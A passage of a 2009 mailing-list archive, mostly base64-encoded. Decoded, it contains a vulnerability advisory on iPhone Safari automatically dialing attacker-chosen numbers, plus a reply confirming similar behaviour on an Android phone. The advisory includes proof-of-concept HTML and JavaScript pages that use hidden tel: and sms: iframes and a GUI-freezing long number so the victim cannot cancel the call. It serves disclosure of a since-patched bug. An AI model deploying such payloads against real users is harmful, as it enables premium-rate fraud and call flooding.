aW9uIG9jY3VycyBpZiBhIFRFTCBVUkkgaXMgYWN0aXZhdGVkIGF0IHRoZSBzYW1lIHRpbWUNCj4+
PiAgIFNhZmFyaSBpcyBjbG9zZWQgYnkgbGF1bmNoaW5nIGFuIGV4dGVybmFsIGFwcGxpY2F0aW9u
LCBmb3IgZXhhbXBsZQ0KPj4+ICAgbGF1bmNoaW5nIHRoZSBTTVMgYXBwbGljYXRpb24gKGluIG9y
ZGVyIHRvIGhhbmRsZSBhIFNNUyBVUkkgWzJdKS4gVGhlDQo+Pj4gICBTTVMgYXBwbGljYXRpb24g
Y2FuIGJlIGxhdW5jaGVkIHRocm91Z2ggcGxhY2luZyBhIFNNUyBVUkkgYXMgdGhlDQo+Pj4gICBz
b3VyY2Ugb2YgYW4gaWZyYW1lLiBUaGlzIGlzIHNob3duIGluIHRoZSBmaXJzdCBwcm9vZi1vZi1j
b25jZXB0DQo+Pj4gICBleHBsb2l0IGJlbG93Lg0KPj4+IAkNCj4+PiAgIEZ1cnRoZXIgaW52ZXN0
aWdhdGlvbiBzaG93ZWQgdGhhdCB0aGlzIGJlaGF2aW9yIGNhbiBiZSByZXByb2R1Y2VkIGJ5DQo+
Pj4gICBsYXVuY2hpbmcgb3RoZXIgYXBwbGljYXRpb25zIHN1Y2ggYXM6IE1hcHMsIFlvdVR1YmUs
IGFuZCBpVHVuZXMuDQo+Pj4gICBMYXVuY2hpbmcgdGhlc2UgYXBwbGljYXRpb25zIGNhbiBiZSBh
Y2hpZXZlZCB0aHJvdWdoIGxvYWRpbmcgc3BlY2lhbA0KPj4+ICAgVVJMcyB1c2luZyB0aGUgbWV0
YSByZWZyZXNoIHRhZy4gVGhpcyBpcyBzaG93biBpbiB0aGUgc2Vjb25kDQo+Pj4gICBwcm9vZi1v
Zi1jb25jZXB0IGV4cGxvaXQgYmVsb3cuDQo+Pj4NCj4+PiAgIFdlIGFsc28gZGlzY292ZXJlZCB0
aGF0IHRoZSBidWcgY2FuIGFsc28gYmUgdHJpZ2dlcmVkIHRocm91Z2ggcG9wdXANCj4+PiAgIHdp
bmRvd3MgKGUuZy4gamF2YXNjcmlwdCBhbGVydCkuIEluIHRoaXMgc2l0dWF0aW9uIHRoZSBpbml0
aWF0aW5nIGFwcA0KPj4+ICAgZG9lcyBub3QgbmVlZCB0byBiZSB0ZXJtaWFudGVkIGluIG9yZGVy
IHRvIGFjdGl2ZSB0aGUgY2FsbC4NCj4+PiAJDQo+Pj4gICBGaW5hbGx5LCB3ZSBkaXNjb3ZlcmVk
IGEgc2Vjb25kIGJ1ZyB0aGF0IGNhbiBiZSB1c2VkIHRvIHBlcmZvcm0NCj4+PiAgIG1hbGljaW91
cyBwaG9uZSBjYWxscyB0aGF0IGNhbm5vdCBiZSBwcmV2ZW50ZWQgb3IgY2FuY2VsZWQgYnkgdGhl
DQo+Pj4gICB2aWN0aW0uIFRoaXMgYnVnIGFsbG93cyB0aGUgYXR0YWNrZXIgdG8gZnJlZXogdGhl
IEdVSSAoZ3JhcGhpY2FsIHVzZXINCj4+PiAgIGludGVyZmFjZSkgZm9yIGEgbnVtYmVyIG9mIHNl
Y29uZHMuIFdoaWxlIHRoZSBHVUkgaXMgZnJvemVuIHRoZSBjYWxsDQo+Pj4gICBwcm9ncmVzc2Vz
IGluCXRoZSBiYWNrZ3JvdW5kIGFuZCBjYW5ub3QgYmUgc3RvcHBlZCBieSB0aGUgdmljdGltIHVz
ZXIuDQo+Pj4gICBGcmVlemluZyB0aGUgR1VJIGlzIGFjaGlldmVkIGJ5IHBhc3NpbmcgYSAidmVy
eSBsb25nIiBwaG9uZSBudW1iZXIgdG8NCj4+PiAgIHRoZSBTTVMgYXBwbGljYXRpb24uIFRoZSBT
TVMgYXBwbGljYXRpb24sIGltbWVkaWF0ZWx5IGFmdGVyIGJlaW5nDQo+Pj4gICBzdGFydGVkLCBm
cmVlemVzIHRoZSBpUGhvbmUgR1VJLiBBbHNvIHN3aXRjaGluZyBvZmYgdGhlIGlQaG9uZSBjYW5u
b3QNCj4+PiAgIGJlIHBlcmZvcm1lZCBmYXN0IGVub3VnaCBpbiBvcmRlciB0byBwcmV2ZW50IHRo
ZSBtYWxpY2lvdXMgY2FsbC4NCj4+PiAJDQo+Pj4NCj4+PiAgIFsxXSBodHRwOi8vd3d3LnJmYy1l
ZGl0b3Iub3JnL3JmYy9yZmMzOTY2LnR4dA0KPj4+ICAgWzJdIGh0dHA6Ly90b29scy5pZXRmLm9y
Zy9odG1sL2RyYWZ0LWFudHRpLWdzbS1zbXMtdXJsLTA0DQo+Pj4NCj4+PiAtLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLQ0KPj4+DQo+Pj4gRnVydGhlciBEaXNjdXNzaW9uOg0KPj4+DQo+Pj4g
ICBUaGUgZGlhbGluZyBkaWFsb2cgaXMgY2xlYXJseSBzaG93biB0byB0aGUgdXNlciBhbHNvIHRo
ZSB1c2VyLCBpbiBtb3N0DQo+Pj4gICBjYXNlcywgY2FuJ3QgcHJlc3MgY2FuY2VsIHF1aWNrIGVu
b3VnaCBpbiBvcmRlciB0byBzdG9wIHRoZSBpbml0aWF0aW9uDQo+Pj4gICBvZiB0aGUgY2FsbC4g
T25jZSB0aGUgZXh0ZXJuYWwgYXBwbGljYXRpb24gaXMgbGF1bmNoZWQsIHRoZSB0ZWxlcGhvbnkN
Cj4+PiAgIGFwcGxpY2F0aW9uIGlzIHJ1bm5pbmcgaW4gdGhlIGJhY2tncm91bmQgcGVyZm9ybWlu
ZyB0aGUgY2FsbC4gT25seQ0KPj4+ICAgdGhlIGNhbGwgZm9yd2FyZGluZyBkaWFsb2cgKGNvbnRh
aW5pbmcgdGhlICJkaXNtaXNzIiBidXR0b24pIGluZGljYXRlcw0KPj4+ICAgYSBjYWxsIGJlaW5n
IG1hZGUuDQo+Pj4NCj4+PiAtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KPj4+DQo+Pj4g
UHJvb2Ytb2YtQ29uY2VwdCB3aXRoIHBsYWluIEhUTUwgdXNpbmcgdGhlIFNNUyBhcHBsaWNhdGlv
bjoNCj4+Pg0KPj4+ICAgPGh0bWw+DQo+Pj4gICA8aGVhZD4NCj4+PiAgIDx0aXRsZT5pUGhvbmUg
U2FmYXJpIHBob25lLWF1dG8tZGlhbCBFeHBsb2l0IERlbW8gYnkgQ29sbGluIE11bGxpbmVyDQo+
Pj4gICA8L3RpdGxlPg0KPj4+ICAgPC9oZWFkPg0KPj4+ICAgPGJvZHk+DQo+Pj4gICA8aWZyYW1l
IHNyYz0ic21zOisxNDA4OTc0ODM4OCIgV0lEVEg9NTAgSEVJR0hUPTEwPjwvaWZyYW1lPg0KPj4+
ICAgPGlmcmFtZSBzcmM9InRlbDorMTQwODk3NDgzODgiIFdJRFRIPTUwIEhFSUdIVD0xMD48L2lm
cmFtZT4NCj4+PiAgIDwhLS0gc2Vjb25kIGlmcmFtZSBpcyB0byBhdHRhY2sgcXVpY2sgdXNlcnMg
d2hvIG1hbmFnZSB0byBjbG9zZSB0aGUNCj4+PiAgICAgICAgZmlyc3QgY2FsbC1kaWFsb2cgLy8t
LT4NCj4+PiAgIDxpZnJhbWUgc3JjPSJ0ZWw6KzE0MDg5NzQ4Mzg4IiBXSURUSD01MCBIRUlHSFQ9
MTA+PC9pZnJhbWU+DQo+Pj4gICA8L2JvZHk+DQo+Pj4gICA8L2h0bWw+DQo+Pj4NCj4+PiBQcm9v
Zi1vZi1Db25jZXB0IHVzaW5nIGphdmFzY3JpcHQgYW5kIHRoZSBNYXBzIGFwcGxpY2F0aW9uOg0K
Pj4+DQo+Pj4gICA8aHRtbD4NCj4+PiAgIDxoZWFkPg0KPj4+ICAgPHRpdGxlPmlQaG9uZSBTYWZh
cmkgcGhvbmUtYXV0by1kaWFsIEV4cGxvaXQgRGVtbyBieSBDb2xsaW4gTXVsbGluZXINCj4+PiAg
IDwvdGl0bGU+DQo+Pj4gICA8bWV0YSBodHRwLWVxdWl2PSJyZWZyZXNoIiBjb250ZW50PSIwOw0K
Pj4+ICAgVVJMPWh0dHA6Ly9tYXBzLmdvb2dsZS5kZS9tYXBzP3E9cmhlaW5zdHJhc3NlKzc1K2Rh
cm1zdGFkdCI+DQo+Pj4gICA8L2hlYWQ+DQo+Pj4gICA8Ym9keT4NCj4+PiAgIDxzY3JpcHQgbGFu
Zz1qYXZhc2NyaXB0Pg0KPj4+ICAgZnVuY3Rpb24gYSgpIHsNCj4+PiAgICBkb2N1bWVudC53cml0
ZSgiPGlmcmFtZSBzcmM9XCJ0ZWw6KzE0MDg5NzQ4Mzg4XCIgV0lEVEg9NTAgDQo+Pj4gSEVJR0hU
PTEwPjwvaWZyYW1lPiIpOw0KPj4+ICAgfQ0KPj4+ICAgc2V0VGltZW91dCgiYSgpIiwgMTAwKTsN
Cj4+PiAgIDwvc2NyaXB0Pg0KPj4+ICAgPC9ib2R5Pg0KPj4+ICAgPC9odG1sPg0KPj4+IAkNCj4+
PiBQcm9vZi1vZi1Db25jZXB0IGF0dGFjayB3aGVyZSB0aGUgdmljdGltIHVzZXIgY2Fubm90IHN0
b3AgdGhlIG1hbGljaW91cyANCj4+PiBwaG9uZSBjYWxsOg0KPj4+DQo+Pj4gICA8aHRtbD4NCj4+
PiAgIDxoZWFkPg0KPj4+ICAgPHRpdGxlPmlQaG9uZSBTYWZhcmkgcGhvbmUtYXV0by1kaWFsIEV4
cGxvaXQgRGVtbyBieSBDb2xsaW4gTXVsbGluZXINCj4+PiAgIDwvdGl0bGU+DQo+Pj4gICA8L2hl
YWQ+DQo+Pj4gICA8Ym9keT4NCj4+PiAgIDxzY3JpcHQgbGFuZz1qYXZhc2NyaXB0Pg0KPj4+ICAg
bCA9ICI8aWZyYW1lIHNyYz1cInNtczoiOw0KPj4+ICAgZm9yIChpID0gMDsgaSA8IDEwMDAwOyBp
KyspIHsNCj4+PiAgICAgICAgICAgbCA9IGwgKyAiMzM0MDk0ODAzNDI5ODIzMiI7DQo+Pj4gICB9
DQo+Pj4gICBsID0gbCArICJcIiB3aWR0aD0xMCBoZWlnaHQ9MTA+PC9pZnJhbWU+PGlmcmFtZQ0K
Pj4+ICAgc3JjPVwidGVsOisxNDA4OTc0ODM4OFwiIGhlaWdodD0xMCB3aWR0aD0xMD48L2lmcmFt
ZT4iOw0KPj4+ICAgZG9jdW1lbnQud3JpdGUobCk7DQo+Pj4gICA8L3NjcmlwdD4NCj4+PiAgIDwv
Ym9keT4NCj4+PiAgIDwvaHRtbD4NCj4+Pg0KPj4+IC0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tDQo+Pj4NCj4+PiBNb3JlIERldGFpbGVkIEluZm9ybWF0aW9uOg0KPj4+DQo+Pj4gIERlbW8g
dmlkZW8gYXZhaWxhYmxlIGF0Og0KPj4+ICAgaHR0cDovL3d3dy5tdWxsaW5lci5vcmcvaXBob25l
Lw0KPj4+DQo+Pj4gIEFkdmlzb3JpZXM6DQo+Pj4gICBodHRwOi8vd3d3Lm11bGxpbmVyLm9yZy9z
ZWN1cml0eS9hZHZpc29yaWVzLw0KPj4+DQo+Pj4gLS0tIEVORCBBRFZJU09SWSAtLS0NCj4+Pg0K
Pj4+DQo+Pj4gLS0gDQo+Pj4gQ29sbGluIFIuIE11bGxpbmVyIDxjb2xsaW5AYmV0YXZlcnNpb24u
bmV0Pg0KPj4+IGluZm8vcGdwOiBmaW5nZXIgY29sbGluQGJldGF2ZXJzaW9uLm5ldA0KPj4+IElm
IEJpbGwgR2F0ZXMgaGFkIGEgbmlja2VsIGZvciBldmVyeSB0aW1lIFdpbmRvd3MgY3Jhc2hlZC4u
LiBPaCB3YWl0LCBoZSANCj4+PiBkb2VzIQ0KPg0KPg0KPi0tIA0KPkNvbGxpbiBSLiBNdWxsaW5l
ciA8Y29sbGluQGJldGF2ZXJzaW9uLm5ldD4NCj5pbmZvL3BncDogZmluZ2VyIGNvbGxpbkBiZXRh
dmVyc2lvbi5uZXQNCj5DIGdpdmVzIHlvdSBlbm91Z2ggcm9wZSB0byBoYW5nIHlvdXJzZWxmLiBD
KysgYWxzbyBnaXZlcyB5b3UgdGhlIHRyZWUgDQo+b2JqZWN0IHRvIHRpZSBpdCB0by4NCg==

------OOQ6QVNMQ89GSPKM03TM81BMDDCI85--



From: Mike Ely me@taupehat.com
Sent: Thu 18. Jun 2009 09:14
------OOQR8OIVASFMLRMIKQ9G04MAIHM98G
Content-Type: text/plain;
 charset=utf-8
Content-Transfer-Encoding: base64

Q29uZmlybWVkIG9uIHRoZSBULU1vYmlsZSBHMSBlbWFpbCBhcHAgcnVubmluZyBPUyB2ZXJzaW9u
IDEuNS4gIFdhcyB3b25kZXJpbmcgd2h5IG15IHBob25lIHN0ZXBwZWQgb24gZW1haWwgdG8gZGlh
bCBvdXQgd2hlbiBJIHJlYWQgdGhpcyBlbWFpbCBhbmQgdGhlbiBJIHJlYWQgdGhlIHN1YmplY3Qg
bGluZSA7KQoKRldJVywgaXQgZGlkbid0IGFjdHVhbGx5IGRpYWwsIGp1c3QgbG9hZGVkIHRoZSBk
aWFsZXIgd2l0aCB0aGF0IG51bWJlciByZWFkeS4gIAoKTG9va3MgbGlrZSB0aGlzIGlzIGEgV2Vi
a2l0IGJ1Zywgbm90IFNhZmFyaS4gCgpDb2xsaW4gTXVsbGluZXIgPGNvbGxpbkBiZXRhdmVyc2lv
bi5uZXQ+IHdyb3RlOgoKPlJlbGVhc2VkIHNpbmNlIEFwcGxlIHB1Ymxpc2hlZCB0aGUgaVBob25l
IDMuMCBzZWN1cml0eSBmaXhlcy4NCj4NCj5WdWxuZXJhYmlsaXR5IFJlcG9ydA0KPg0KPi0tLSBC
RUdJTiBBRFZJU09SWSAtLS0NCj4NCj5NYW51ZmFjdHVyZXI6IEFwcGxlICh3d3cuYXBwbGUuY29t
KQ0KPkRldmljZTogICAgICAgaVBob25lIDNHIChpUGhvbmUgMXN0IEdlbikNCj5GaXJtd2FyZTog
ICAgIDIuMSAocG9zc2libGUgZWFybGllciB2ZXJzaW9ucykNCj5EZXZpY2UgVHlwZTogIHNtYXJ0
IHBob25lDQo+DQo+U3Vic3lzdGVtczogU2FmYXJpIChhbmQgbW9iaWxlIHRlbGVwaG9ueSkNCj4N
Cj4tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KPg0KPlNob3J0IG5hbWU6DQo+ICAgaVBo
b25lIFNhZmFyaSBwaG9uZS1hdXRvLWRpYWwgKHZ1bG5lcmFiaWxpdHkpDQo+DQo+VnVsbmVyYWJp
bGl0eSBjbGFzczoNCj4gICBhcHBsaWNhdGlvbiBsb2dpYyBidWcNCj4NCj5FeGVjdXRpdmUgU3Vt
bWFyeToNCj4gICBBIG1hbGljaW91cyB3ZWJzaXRlIGNhbiBpbml0aWF0ZSBhIHBob25lIGNhbGwg
d2l0aG91dCB0aGUgbmVlZCBvZiB1c2VyDQo+ICAgaW50ZXJhY3Rpb24uIFRoZSBkZXN0aW5hdGlv
biBwaG9uZSBudW1iZXIgaXMgY2hvc2VuIGJ5IHRoZSBhdHRhY2tlci4NCj4NCj5SaXNrOiBNRURJ
VU0tSElHSA0KPiAgIE1lZGl1bSB0byBoaWdoIHJpc2sgZHVlIHRvIHRoZSBwb3NzaWJpbGl0eSBv
ZiBmaW5hbmNpYWwgZ2FpbiB0aHJvdWdoDQo+ICAgdGhpcyBhdHRhY2sgYnkgY2FsbGluZyBvZiBw
cmVtaXVtIHJhdGUgbnVtYmVycyAoZS5nLiAxLTkwMCBpbiB0aGUNCj4gICBVLlMuKS4gRGVuaWFs
LW9mLXNlcnZpY2UgYWdhaW5zdCBhcmJpdHJhcnkgcGhvbmUgbnVtYmVycyB0aHJvdWdoDQo+ICAg
bWFzcy1jYWxsaW5nLiBVc2VyIGNhbm5vdCBwcmV2ZW50IGF0dGFjay4NCj4NCj4tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLQ0KPg0KPlJlcG9ydGVyOiBDb2xsaW4gTXVsbGluZXIgPGNvbGxp
bltBVF1tdWxsaW5lci5vcmc+DQo+DQo+LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCj4N
Cj5BZmZpbGlhdGlvbjogTVVsbGlORVIuT1JHIC8gdGhlIHRyaWZpbml0ZSBncm91cCAvIChGcmF1
bmhvZmVyIFNJVCkNCj4NCj4tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KPg0KPlRpbWUg
bGluZToNCj4NCj4gICBPY3QuIDIwLiAyMDA4OiBSZXBvcnRlZCB2dWxuZXJhYmlsaXR5IHRvIHZl
bmRvci4NCj4gICBPY3QuIDIwLiAyMDA4OiBWZW5kb3IgYWNrbm93bGVkZ2VzIHJlY2VpdmluZyBv
dXIgZW1haWwuDQo+ICAgICAgICAgICAgICAgICAgTm90IGNvbW1lbnRpbmcgb24gdGhlIHZ1bG5l
cmFiaWxpdHkgaXRzZWxmLg0KPiAgIE9jdC4gMjcuIDIwMDg6IFNlbnQgdXBkYXRlIHRvIHZlbmRv
ciwgYWxzbyByZXF1ZXN0aW5nIGEgc3RhdHVzIHJlcG9ydC4NCj4gICBPY3QuIDI5LiAyMDA4OiBS
ZXBseSBmcm9tIHZlbmRvciBhY2tub3dsZWRnaW5nIHRoZSB2dWxuZXJhYmlsaXR5Lg0KPiAgIE9j
dC4gMzAuIDIwMDg6IFNlbnQgYWRkaXRpb25hbCBpbmZvcm1hdGlvbi4NCj4gICBOb3YuIDEzLiAy
MDA4OiBWZW5kZXIgc2F5cyB2dWxuZXJhYmlsaXR5IGlzIGZpeGVkIGluIHVwY29taW5nIE9TDQo+
ICAgICAgICAgICAgICAgICAgdmVyc2lvbi4NCj4gICBOb3YuIDIwLiAyMDA4OiBQdWJsaWMgZGlz
Y2xvc3VyZS4NCj4gICBKdW4uIDE4LiAyMDA5OiBGdWxsLURpc2Nsb3N1cmUuDQo+DQo+LS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCj4NCj5GaXg6DQo+DQo+ICAgaVBob25lIE9TIDIuMg0K
PiAgIGlQaG9uZSBPUyAyLjIuMQ0KPiAgIGlQaG9uZSBPUyAzLjANCj4JDQo+LS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0NCj4NCj5UZWNobmljYWwgRGV0YWlsczoNCj4NCj4gICBUaGUgU2Fm
YXJpIHZlcnNpb24gcnVubmluZyBvbiB0aGUgaVBob25lIHN1cHBvcnRzIGhhbmRsaW5nIHRoZSBU
RUwgWzFdDQo+ICAgcHJvdG9jb2wgdGhyb3VnaCBsYXVuY2hpbmcgdGhlIHRlbGVwaG9ueS9kaWFs
ZXIgYXBwbGljYXRpb24uIFRoaXMgaXMNCj4gICBkb25lIGJ5IHBhc3NpbmcgdGhlIHByb3ZpZGVk
IHBob25lIG51bWJlciB0byB0aGUgdGVsZXBob255DQo+ICAgYXBwbGljYXRpb24uIFVuZGVyIG5v
cm1hbCBjb25kaXRpb25zLCBsb2FkaW5nIGEgdGVsOiBVUkkgcmVzdWx0cyBpbiBhDQo+ICAgbWVz
c2FnZSBib3ggYXNraW5nIHRoZSB1c2VyJ3MgcGVybWlzc2lvbiB0byBjYWxsIHRoZSBnaXZlbiBu
dW1iZXIuIFRoZQ0KPiAgIHVzZXIgaXMgcHJlc2VudGVkIHdpdGggdGhlIHNpbXBsZSBjaG9pY2Ug
dG8gZWl0aGVyIHByZXNzIGNhbGwgb3INCj4gICBjYW5jZWwuDQo+DQo+ICAgQSBURUwgVVJJIGNh
biBiZSBvcGVuZWQgYXV0b21hdGljYWxseSBpZiB0aGUgVEVMIFVSSSBpcyB1c2VkIGFzIHRoZQ0K
PiAgIHNvdXJjZSBvZiBhbiBIVE1MIGlmcmFtZSBvciBmcmFtZSwgYXMgdGhlIFVSTCBvZiBhIG1l
dGEgcmVmcmVzaCwgYXMNCj4gICB0aGUgbG9jYXRpb24gb2YgYSBIVFRQIDMwWCByZWRpcmVjdCwg
YW5kIGFzIHRoZSBsb2NhdGlvbiBvZiB0aGUNCj4gICBjdXJyZW50IG9yIGEgbmV3IHdpbmRvdyB1
c2luZyBqYXZhc2NyaXB0Lg0KPg0KPiAgIFdlIGRpc2NvdmVyZWQgYSBzZWN1cml0eSB2dWxuZXJh
YmlsaXR5IHRoYXQgZGlzbWlzc2VzIHRoZSAiYXNrIGZvcg0KPiAgIHBlcm1pc3Npb24gdG8gY2Fs
bCIgZGlhbG9nIGluIGEgd2F5IHRoYXQgY2hvb3NlcyB0aGUgImNhbGwiIG9wdGlvbg0KPiAgIHJh
dGhlciB0aGFuIHRoZSAiY2FuY2VsIiBvcHRpb24uDQo+CQ0KPiAgIFRoaXMgY29uZGl0aW9uIG9j
Y3VycyBpZiBhIFRFTCBVUkkgaXMgYWN0aXZhdGVkIGF0IHRoZSBzYW1lIHRpbWUNCj4gICBTYWZh
cmkgaXMgY2xvc2VkIGJ5IGxhdW5jaGluZyBhbiBleHRlcm5hbCBhcHBsaWNhdGlvbiwgZm9yIGV4
YW1wbGUNCj4gICBsYXVuY2hpbmcgdGhlIFNNUyBhcHBsaWNhdGlvbiAoaW4gb3JkZXIgdG8gaGFu
ZGxlIGEgU01TIFVSSSBbMl0pLiBUaGUNCj4gICBTTVMgYXBwbGljYXRpb24gY2FuIGJlIGxhdW5j
aGVkIHRocm91Z2ggcGxhY2luZyBhIFNNUyBVUkkgYXMgdGhlDQo+ICAgc291cmNlIG9mIGFuIGlm
cmFtZS4gVGhpcyBpcyBzaG93biBpbiB0aGUgZmlyc3QgcHJvb2Ytb2YtY29uY2VwdA0KPiAgIGV4
cGxvaXQgYmVsb3cuDQo+CQ0KPiAgIEZ1cnRoZXIgaW52ZXN0aWdhdGlvbiBzaG93ZWQgdGhhdCB0
aGlzIGJlaGF2aW9yIGNhbiBiZSByZXByb2R1Y2VkIGJ5DQo+ICAgbGF1bmNoaW5nIG90aGVyIGFw
cGxpY2F0aW9ucyBzdWNoIGFzOiBNYXBzLCBZb3VUdWJlLCBhbmQgaVR1bmVzLg0KPiAgIExhdW5j
aGluZyB0aGVzZSBhcHBsaWNhdGlvbnMgY2FuIGJlIGFjaGlldmVkIHRocm91Z2ggbG9hZGluZyBz
cGVjaWFsDQo+ICAgVVJMcyB1c2luZyB0aGUgbWV0YSByZWZyZXNoIHRhZy4gVGhpcyBpcyBzaG93
biBpbiB0aGUgc2Vjb25kDQo+ICAgcHJvb2Ytb2YtY29uY2VwdCBleHBsb2l0IGJlbG93Lg0KPg0K
PiAgIFdlIGFsc28gZGlzY292ZXJlZCB0aGF0IHRoZSBidWcgY2FuIGFsc28gYmUgdHJpZ2dlcmVk
IHRocm91Z2ggcG9wdXANCj4gICB3aW5kb3dzIChlLmcuIGphdmFzY3JpcHQgYWxlcnQpLiBJbiB0
aGlzIHNpdHVhdGlvbiB0aGUgaW5pdGlhdGluZyBhcHANCj4gICBkb2VzIG5vdCBuZWVkIHRvIGJl
IHRlcm1pYW50ZWQgaW4gb3JkZXIgdG8gYWN0aXZlIHRoZSBjYWxsLg0KPgkNCj4gICBGaW5hbGx5
LCB3ZSBkaXNjb3ZlcmVkIGEgc2Vjb25kIGJ1ZyB0aGF0IGNhbiBiZSB1c2VkIHRvIHBlcmZvcm0N
Cj4gICBtYWxpY2lvdXMgcGhvbmUgY2FsbHMgdGhhdCBjYW5ub3QgYmUgcHJldmVudGVkIG9yIGNh
bmNlbGVkIGJ5IHRoZQ0KPiAgIHZpY3RpbS4gVGhpcyBidWcgYWxsb3dzIHRoZSBhdHRhY2tlciB0
byBmcmVleiB0aGUgR1VJIChncmFwaGljYWwgdXNlcg0KPiAgIGludGVyZmFjZSkgZm9yIGEgbnVt
YmVyIG9mIHNlY29uZHMuIFdoaWxlIHRoZSBHVUkgaXMgZnJvemVuIHRoZSBjYWxsDQo+ICAgcHJv
Z3Jlc3NlcyBpbgl0aGUgYmFja2dyb3VuZCBhbmQgY2Fubm90IGJlIHN0b3BwZWQgYnkgdGhlIHZp
Y3RpbSB1c2VyLg0KPiAgIEZyZWV6aW5nIHRoZSBHVUkgaXMgYWNoaWV2ZWQgYnkgcGFzc2luZyBh
ICJ2ZXJ5IGxvbmciIHBob25lIG51bWJlciB0bw0KPiAgIHRoZSBTTVMgYXBwbGljYXRpb24uIFRo
ZSBTTVMgYXBwbGljYXRpb24sIGltbWVkaWF0ZWx5IGFmdGVyIGJlaW5nDQo+ICAgc3RhcnRlZCwg
ZnJlZXplcyB0aGUgaVBob25lIEdVSS4gQWxzbyBzd2l0Y2hpbmcgb2ZmIHRoZSBpUGhvbmUgY2Fu
bm90DQo+ICAgYmUgcGVyZm9ybWVkIGZhc3QgZW5vdWdoIGluIG9yZGVyIHRvIHByZXZlbnQgdGhl
IG1hbGljaW91cyBjYWxsLg0KPgkNCj4NCj4gICBbMV0gaHR0cDovL3d3dy5yZmMtZWRpdG9yLm9y
Zy9yZmMvcmZjMzk2Ni50eHQNCj4gICBbMl0gaHR0cDovL3Rvb2xzLmlldGYub3JnL2h0bWwvZHJh
ZnQtYW50dGktZ3NtLXNtcy11cmwtMDQNCj4NCj4tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LQ0KPg0KPkZ1cnRoZXIgRGlzY3Vzc2lvbjoNCj4NCj4gICBUaGUgZGlhbGluZyBkaWFsb2cgaXMg
Y2xlYXJseSBzaG93biB0byB0aGUgdXNlciBhbHNvIHRoZSB1c2VyLCBpbiBtb3N0DQo+ICAgY2Fz
ZXMsIGNhbid0IHByZXNzIGNhbmNlbCBxdWljayBlbm91Z2ggaW4gb3JkZXIgdG8gc3RvcCB0aGUg
aW5pdGlhdGlvbg0KPiAgIG9mIHRoZSBjYWxsLiBPbmNlIHRoZSBleHRlcm5hbCBhcHBsaWNhdGlv
biBpcyBsYXVuY2hlZCwgdGhlIHRlbGVwaG9ueQ0KPiAgIGFwcGxpY2F0aW9uIGlzIHJ1bm5pbmcg
aW4gdGhlIGJhY2tncm91bmQgcGVyZm9ybWluZyB0aGUgY2FsbC4gT25seQ0KPiAgIHRoZSBjYWxs
IGZvcndhcmRpbmcgZGlhbG9nIChjb250YWluaW5nIHRoZSAiZGlzbWlzcyIgYnV0dG9uKSBpbmRp
Y2F0ZXMNCj4gICBhIGNhbGwgYmVpbmcgbWFkZS4NCj4NCj4tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLQ0KPg0KPlByb29mLW9mLUNvbmNlcHQgd2l0aCBwbGFpbiBIVE1MIHVzaW5nIHRoZSBT
TVMgYXBwbGljYXRpb246DQo+DQo+ICAgPGh0bWw+DQo+ICAgPGhlYWQ+DQo+ICAgPHRpdGxlPmlQ
aG9uZSBTYWZhcmkgcGhvbmUtYXV0by1kaWFsIEV4cGxvaXQgRGVtbyBieSBDb2xsaW4gTXVsbGlu
ZXINCj4gICA8L3RpdGxlPg0KPiAgIDwvaGVhZD4NCj4gICA8Ym9keT4NCj4gICA8aWZyYW1lIHNy
Yz0ic21zOisxNDA4OTc0ODM4OCIgV0lEVEg9NTAgSEVJR0hUPTEwPjwvaWZyYW1lPg0KPiAgIDxp
ZnJhbWUgc3JjPSJ0ZWw6KzE0MDg5NzQ4Mzg4IiBXSURUSD01MCBIRUlHSFQ9MTA+PC9pZnJhbWU+
DQo+ICAgPCEtLSBzZWNvbmQgaWZyYW1lIGlzIHRvIGF0dGFjayBxdWljayB1c2VycyB3aG8gbWFu
YWdlIHRvIGNsb3NlIHRoZQ0KPiAgICAgICAgZmlyc3QgY2FsbC1kaWFsb2cgLy8tLT4NCj4gICA8
aWZyYW1lIHNyYz0idGVsOisxNDA4OTc0ODM4OCIgV0lEVEg9NTAgSEVJR0hUPTEwPjwvaWZyYW1l
Pg0KPiAgIDwvYm9keT4NCj4gICA8L2h0bWw+DQo+DQo+UHJvb2Ytb2YtQ29uY2VwdCB1c2luZyBq
YXZhc2NyaXB0IGFuZCB0aGUgTWFwcyBhcHBsaWNhdGlvbjoNCj4NCj4gICA8aHRtbD4NCj4gICA8
aGVhZD4NCj4gICA8dGl0bGU+aVBob25lIFNhZmFyaSBwaG9uZS1hdXRvLWRpYWwgRXhwbG9pdCBE
ZW1vIGJ5IENvbGxpbiBNdWxsaW5lcg0KPiAgIDwvdGl0bGU+DQo+ICAgPG1ldGEgaHR0cC1lcXVp
dj0icmVmcmVzaCIgY29udGVudD0iMDsNCj4gICBVUkw9aHR0cDovL21hcHMuZ29vZ2xlLmRlL21h
cHM/cT1yaGVpbnN0cmFzc2UrNzUrZGFybXN0YWR0Ij4NCj4gICA8L2hlYWQ+DQo+ICAgPGJvZHk+
DQo+ICAgPHNjcmlwdCBsYW5nPWphdmFzY3JpcHQ+DQo+ICAgZnVuY3Rpb24gYSgpIHsNCj4gICAg
ZG9jdW1lbnQud3JpdGUoIjxpZnJhbWUgc3JjPVwidGVsOisxNDA4OTc0ODM4OFwiIFdJRFRIPTUw
IA0KPkhFSUdIVD0xMD48L2lmcmFtZT4iKTsNCj4gICB9DQo+ICAgc2V0VGltZW91dCgiYSgpIiwg
MTAwKTsNCj4gICA8L3NjcmlwdD4NCj4gICA8L2JvZHk+DQo+ICAgPC9odG1sPg0KPgkNCj5Qcm9v
Zi1vZi1Db25jZXB0IGF0dGFjayB3aGVyZSB0aGUgdmljdGltIHVzZXIgY2Fubm90IHN0b3AgdGhl
IG1hbGljaW91cyANCj5waG9uZSBjYWxsOg0KPg0KPiAgIDxodG1sPg0KPiAgIDxoZWFkPg0KPiAg
